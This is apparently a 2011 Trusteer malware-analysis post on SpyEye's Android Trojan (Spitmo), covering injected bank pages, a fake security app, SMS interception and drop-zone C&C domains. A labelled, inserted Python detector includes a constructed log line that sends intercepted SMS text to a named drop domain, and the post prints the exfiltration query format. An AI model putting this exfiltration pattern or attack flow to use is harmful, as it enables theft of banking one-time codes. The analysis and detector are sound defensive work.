First SpyEye Attack on Android Mobile Platform Now in the Wild

It seems that SpyEye distributors are catching up with the mobile market as they (finally) target the Android mobile platform.

Ever since Man-in-the-Mobile attacks (MitMo/ZitMo) first emerged in late 2010, SpyEye has followed Zeus' tracks by introducing its own hybrid desktop-mobile attacks (dubbed SPITMO).

Trojan:SymbOS/Spitmo

The most recent achievement of SpyEye in the mobile arena (that is, until our discovery at the end of July) was reported in April on F-Secure's blog.

The Trojan injects fields into a bank’s Web page and asks customers to input their mobile phone number and the IMEI of the phone. The bank customers are then told the information is needed so a “certificate” can be sent to the phone and are informed that it can take up to three days before the certificate is ready.

“The Trojan is signed with a developer certificate. Developer certificates are tied to certain IMEIs and can only be installed to phones that have an IMEI that is listed in the certificate. This is why the malware author(s) request the IMEI in addition to the phone number on the bank’s website. Once they receive new IMEIs, they request an updated certificate with IMEIs for all victims and create a new installer signed with the updated certificate.”

“The delay in getting the new certificate explains why the SpyEye-injected message states it can take up to three days for the certificate to be delivered.”

Up to three days to accomplish an attack in 2011? The delay comes from the cumbersome cycle needed to circumvent Symbian's signing requirement:

  • Ask the user for their device’s IMEI;
  • Generate an appropriate certificate;
  • Release an updated installer.

Trojan:AndroidOS/Spitmo

Waiting three days just to steal a couple of SMSs is not a reasonable overhead now that we have Android OS, which offers a much more direct and modern route to the desired treasure: an APK can simply be side-loaded, with no IMEI-bound developer certificate in the way.

Before we dive into the analysis, here’s a pictorial overview of MitMo evolution.

[Figure: MitMo evolution]

The following analysis is based on a compromised machine with SpyEye as found by Trusteer, an IBM company, in the wild on July 24th:

Stage 1: MITB — Web Injects Module (You Know the Drill…)

When a compromised user browses to the targeted bank, a message is injected presenting a "new" security measure, supposedly enforced by the bank, which is now mandatory in order to use its online banking service. The new measure claims to be an Android application that protects the phone's SMS messages from being intercepted (there's irony for you) and will protect the user against fraud.

[Figure: Stage 1, MITB web-injects module: the injected "security measure" message]

Clicking on “set the application” displays an additional injected message, providing further instructions for installing the application:

[Figure: Stage 1, second injected message with installation instructions]

Stage 2: Android (Malicious) Mobile App Installation

The user is directed to the download URL “hxxp://www.androidseguridad.com/simseg.apk.”

After the compromised user installs the Android application on his or her device, an application named "System" is nowhere to be seen on the device dashboard: it does not run as a visible service and is not listed among the currently running applications. A user has to dig a bit to discover that the app exists at all:

[Figure: Stage 2, Android app installation: locating the "System" application]

To complete the installation, the user is instructed to dial the number “325000”; the call is intercepted by the Android malware and the “alleged” activation code is presented, to be submitted later into the “bank’s site”:

[Figure: Stage 2, "activation code" displayed after dialing 325000]

The following is a de-compiled code snippet that is responsible for the “activation code” operation. There is no other reference to it in the application package (as of July 24):

[Figure: Stage 2, de-compiled "activation code" snippet]

Stage 3: Android Secure Application Is a Trojan

Now that the Trojan has installed successfully, all incoming SMSs are intercepted and forwarded to the attacker's C&C; the de-compiled code snippet below runs whenever an SMS is received and builds a string for later use:

"?sender=[SenderAddress]&receiver=[ReceiverAddress]&text=[MessageBody]"

[Figure: Stage 3, de-compiled SMS-received handler]

As implied from the string structure, it will later be appended as a query string to a GET HTTP request to be sent to the attacker’s drop zone.

The application package contains a "Settings.xml" file (in the assets directory) that holds the Trojan's configuration; "Settings.xml" defines:

  • The transfer method, i.e. SMS or HTTP
  • The attacker's drop zone URLs

Here’s a snippet of the extracted “Settings.xml”:

[Figure: Stage 3, extracted Settings.xml snippet]
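As an added example (not code from the original post, and not the Trojan's own code), here is a Python detector for the exfiltration described in Stage 3: it reads proxy log lines with absolute URLs, flags GET requests whose query string carries the Trojan's three keys (sender, receiver, text), and checks the destination host against the drop-zone domains listed in Stage 4 below. The log lines, the "gate.php" path and the SMS bodies are constructed for the example; the domains and the emulator numbers 15555215556/15555215554 are the ones the post reports.

```python
"""
Spitmo-style SMS exfiltration detector for HTTP proxy logs.
Added example; not from the post or the malware. All log data below is constructed.
"""
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Drop-zone domains named in Stage 4 of the post.
DROP_DOMAINS = {"124ffsaf.com", "124ff42.com", "124ffdfsaf.com", "124sfafsaffa.com"}

# Query-string keys the Trojan composes after an SMS arrives (Stage 3).
EXFIL_KEYS = {"sender", "receiver", "text"}

# Combined-log-style proxy line: client ident user [time] "METHOD URL HTTP/x" status bytes
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: one hit to a known drop domain, one benign request, and one
# hit to a host that is NOT in the list (a new drop domain the attacker rotated to).
# The path "gate.php" and the message bodies are invented for the example.
SAMPLE_LOG = """\
10.0.0.7 - - [24/Jul/2011:10:15:02 +0000] "GET http://124ffsaf.com/gate.php?sender=15555215556&receiver=15555215554&text=Your+TAN+is+123456 HTTP/1.1" 200 14
10.0.0.7 - - [24/Jul/2011:10:15:05 +0000] "GET http://www.example.com/index.html HTTP/1.1" 200 5120
10.0.0.9 - - [24/Jul/2011:10:16:40 +0000] "GET http://newdrop.example/x.php?sender=15555215556&receiver=15555215554&text=hello HTTP/1.1" 404 0
"""


def build_exfil_query(sender, receiver, text):
    """Rebuild the string the Trojan composes (same three keys, same order), as a
    reference for what the detector should match."""
    return "?" + urlencode([("sender", sender), ("receiver", receiver), ("text", text)])


def classify_request(url):
    """Return a finding dict if `url` looks like Spitmo SMS exfiltration, else None.

    Matching is on the query-string shape, not the host, so a request to a
    not-yet-listed drop domain is still reported (with known_drop=False)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not EXFIL_KEYS.issubset(query):
        return None
    host = parts.hostname or ""
    return {
        "host": host,
        "known_drop": host in DROP_DOMAINS,
        "sender": query["sender"][0],
        "receiver": query["receiver"][0],
        "text": query["text"][0],
    }


def scan_log(lines):
    """Yield (client_ip, finding) for every GET line whose URL matches."""
    for line in lines:
        m = _LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        finding = classify_request(m.group("url"))
        if finding:
            yield m.group("client"), finding


if __name__ == "__main__":
    for client, f in scan_log(SAMPLE_LOG.splitlines()):
        tag = "KNOWN DROP" if f["known_drop"] else "unknown drop host"
        print(f"{client} -> {f['host']} [{tag}] {f['sender']} -> {f['receiver']}: {f['text']!r}")
```

Because the match is on the `sender`/`receiver`/`text` triple rather than on a domain list, the detector keeps working when the attacker rotates to a fresh, unregistered drop domain; the domain list only upgrades the confidence of a hit. Note that `parse_qs` decodes `+` as a space, so the forwarded message body is recovered as typed.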

Stage 4: SMS Spy Command & Control

When examining the drop URLs, three of the four domain names in use are not registered (yet!): 124ff42.com; 124ffdfsaf.com; and 124sfafsaffa.com.

However, the fourth one is already known in connection with SpyEye: the domain "124ffsaf.com" has been "hopping" around different IPs, in several locations, around the world.

Here's a snippet from the SpyEye Tracker history record for the domain 124ffsaf.com over a three-day period:

[Figure: Stage 4, SpyEye Tracker history for 124ffsaf.com]

Peeking around the attacker C&C reveals an unprotected (at the moment!) statistics page:

[Figure: Stage 4, attacker C&C statistics page]

It's worth pointing out that the information presented in the attacker C&C page above was produced when we tested the Trojan in action in our lab. Sender 15555215556 and recipient 15555215554 refer to the two Android emulators we used to simulate the attack (the corresponding HTTP traffic is shown above).

As indicated by the statistics page above, the attack has yet to gain momentum, so consider this a warning. I’m pretty sure this is just the beginning, so I’m tempted to say, “To be continued…”

SPITMO for Android Mobile Platform Loses the Battle Against Trusteer

Organizations must act now and install a desktop browser security solution as part of a multilayered security profile.

For banks that already offer Trusteer Rapport to their customers, the good news is they’re automatically protected and are not vulnerable to this attack — even if the Trojan is downloaded. This is because Rapport prevents SpyEye from installing on the customer’s PC; therefore, the entire chain of attack is terminated before it has a chance to take hold.

For those that haven’t downloaded Rapport, Trusteer Pinpoint will detect and report in real time victims who are infected with this variant of SpyEye as they attempt to connect to the bank’s website. By restricting the services available to these machines, such as the ability to complete transactions, the attack is defeated.

Finally, Trusteer Mobile for Android (either Secure Library or Secure Browser) will detect and block this attack on the Android mobile platform, preventing any malicious activity.

This article was originally written by the IBM Trusteer security research team.

Amit Klein

CTO, Trusteer, an IBM company

As Trusteer's CTO, Amit Klein is responsible for researching and introducing game-changing technologies into Trusteer's products, with particular focus on Trusteer's enterprise solutions. Prior to that, Mr. Klein established, managed and grew the company's security group, which is one of the world's leading financial malware research groups. Prior to Trusteer, Mr. Klein was Chief Scientist at Cyota Inc. (acquired by RSA Security), a leading provider of layered authentication solutions. In this role, Mr. Klein researched technologies that prevent online fraud, phishing, and pharming and filed several patents in those areas. Prior to this, Mr. Klein worked as Director of Security and Research at Sanctum, Inc. (acquired by Watchfire, now part of IBM Security Systems), where he was responsible for the security content of all Sanctum products. Mr. Klein holds a B.Sc. (cum laude) in Mathematics and Physics from the Hebrew University of Jerusalem (through IDF's Talpiot programme). Mr. Klein is a world-renowned security researcher, having published more than thirty articles, papers and technical notes on the topic of Internet security. He was named CTO of the Year by InfoWorld Magazine and has presented at many prestigious conferences including RSA US, FSISAC, OWASP, Microsoft BlueHat, InterOp USA, AusCERT and CertConf.